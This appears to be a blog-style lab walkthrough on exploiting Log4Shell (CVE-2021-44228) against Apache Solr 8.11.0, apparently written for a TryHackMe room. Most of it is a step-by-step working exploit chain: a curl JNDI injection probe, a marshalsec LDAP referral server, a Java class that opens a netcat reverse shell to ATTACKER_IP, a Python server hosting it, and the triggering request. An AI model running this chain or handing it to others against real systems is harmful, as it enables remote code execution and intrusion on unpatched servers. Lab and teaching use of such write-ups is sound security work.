The exploitation of a vulnerability named Log4Shell (CVE-2021–44228)


This lab covers the exploitation of a vulnerability in Log4j.

Apache Solr 8.11.0 is running on the target machine which this version of the software is prone to vulnerable log4j package (CVE-2021–44228). The application itself runs on Java 1.8.0_181.


We can see clear indicators of log4j used for logging activity when we browse Solr Admin Dashboard:

In order to find the injection point, we can review the log files of the “Solr”. The “solr.log” has a significant number of INFO entries showing repeated requests to one specific URL endpoint (/solr/admin/cores).

The “params” field name indicates some data entry point that we can use as an injection point. Here we can see from the inspected traffic with proxy.


The log4j package adds extra logic to logs by “parsing” entries, ultimately to enrich the data — but may additionally take actions and even evaluate code based on the entry data. This is the gist of CVE-2021-44228.

To exploit this issue, we need to have a malicious LDAP server.

The “Marshalsec” can be used for this part:

We need a public IP address and two ports: one for the LDAP server and one for the HTTP Server that will host the malicious class.

Let’s check if we can confirm whether the target is vulnerable or not.

curl 'http://vulnsolr.loc:8983/solr/admin/cores?_=$\{jndi:ldap://ATTACKER_IP:LPORT\}'


From the output, we can see that the netcat listener was able to catch inbound traffic from the vulnerable machine.

Well, run the below command to build the “marshalsec” utility:

mvn clean package -DskipTests

With the marshalsec utility, we can start an LDAP referral server to direct connections to our secondary HTTP server:

sudo java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ATTACKER_IP:8000/#Log4jshell

Now, time to create a malicious class containing a reverse shell with Java.


public class Log4jshell { static { try { java.lang.Runtime.getRuntime().exec("nc -e /bin/bash ATTACKER_IP LPORT"); } catch (Exception e) { e.printStackTrace(); } } }

Compile malicious payload:



With python, we can run HTTP Server that hosts the malicious class.

python3 -m http.server 8000

Finally, we can request a malicious class in order to trigger the reverse shell and execute commands.

curl 'http://vulnsolr.loc:8983/solr/admin/cores?_=$\{jndi:ldap://ATTACKER_IP:LDAP_PORT/Log4jshell\}'


All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.

For further practice you can follow the THM room:


Originally published at on December 14, 2021.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store